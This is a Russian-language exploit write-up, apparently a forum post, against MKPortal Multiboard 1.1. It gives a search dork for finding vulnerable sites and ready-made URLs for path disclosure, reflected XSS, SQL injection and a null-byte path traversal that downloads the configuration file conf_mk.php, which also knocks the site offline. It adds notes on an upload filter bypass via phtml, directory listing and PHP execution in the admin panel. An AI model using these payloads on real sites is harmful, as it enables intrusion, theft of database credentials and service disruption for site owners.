MKPortal Multiboard 1.1
Уязвимый продукт: MKPortal Multiboard 1.1
Дорк: "inurl:index.php?ind="
1. Расскрытие пути
Exploit:
Код:
/index.php?ind[]=news
/mkportal/admin/ad_menu.php
Вызов любого скрипта из папки blocks, например:
/mkportal/blocks/chat.php
/mkportal/blocks/random_pic.php
/mkportal/blocks/random_quote.php
/mkportal/blocks/search.php
В скрипты не инклудятся файлы, однако идет вызов сторонних функций
2. XSS
Код:
PHP код:
$return = "http://".$_SERVER.$_SERVER."?".$_SERVER."#cal";
Exploit:
Код:
Множественные уязвимости из-за стандартного модуля - календарь
/index.php?"><script>alert()</script>
Либо любой линк подобного типа, например
/index.php?ind=gallery&op=section_view"><script>alert()</script>
/mkportal/include/pmpopup.php?m1=<script>alert()</script>
/mkportal/include/pmpopup.php?m2=<script>alert()</script>
/mkportal/include/pmpopup.php?m3=<script>alert()</script>
/mkportal/include/pmpopup.php?m4=<script>alert()</script>
3. SQL-INJ
Exploit:
Код:
http://cms.ru/index.php?ind=news&op=del_comment&idcomm={SQL-INJ}
Скуль требует админских прав, посему толку мало.
4. Возможность скачать любые файлы, в том числе конфигурационные
Exploit:
Код:
/index.php?ind=downloads&op=download_file&ide=2&file=../../../conf_mk.php%00
Единственный косяк(а иногда плюс) - что при таком запросе запрашиваемый файл (
../../../conf_mk.php)
переименовывается в
/modules/downloads/file/mk_{IDE}_{FILE_NAME}.mk
PHP код:
...
$real_file = "mkportal/modules/downloads/file/mk_".$ide."_".$file;
...
if (is_file("mkportal/modules/downloads/file/".$file)) {
@rename("mkportal/modules/downloads/file/".$file, $real_file);
}
И вот в чем прикол, если запросить конфигурационный файл, мы его запросим на загрузку,
НО он переместится в папку
mkportal/modules/downloads/file/,
и соответственно в корне его не будет => не будет работать движок...
(в принципе нужно подумать как это можно еще заюзать... можно также переместить какой нибудь
подключаемый файл и радоваться необъявленными переменными...)
5. Разные сведения и мысли
1. (.htaccess отсутствует напрочь везде)
2. (В index.php?ind=downloads&op=add_file запрещена загрузка php,
a phtml проходит, однако переименовывается в /modules/downloads/file/mk_{IDE}_{FILE_NAME}.
mk)
3. Директория mkportal/modules/downloads/file/ как и многие другие доступна для листинга
4. Выполнение пхп кода в админке
http://cms.ru/mkportal/admin.php?ind=ad_blocks&op=blocks_new_php
(блоки->создание->Создать блок php, пишем код, нажимаем пимпу "Предпросмотр кода" )
5. Все эти баги работают не везде, поэтому есть мысль, что по просторам гуляют разные "Сборки" двига, а загрузка на официальном сайте сейчас прикрыта...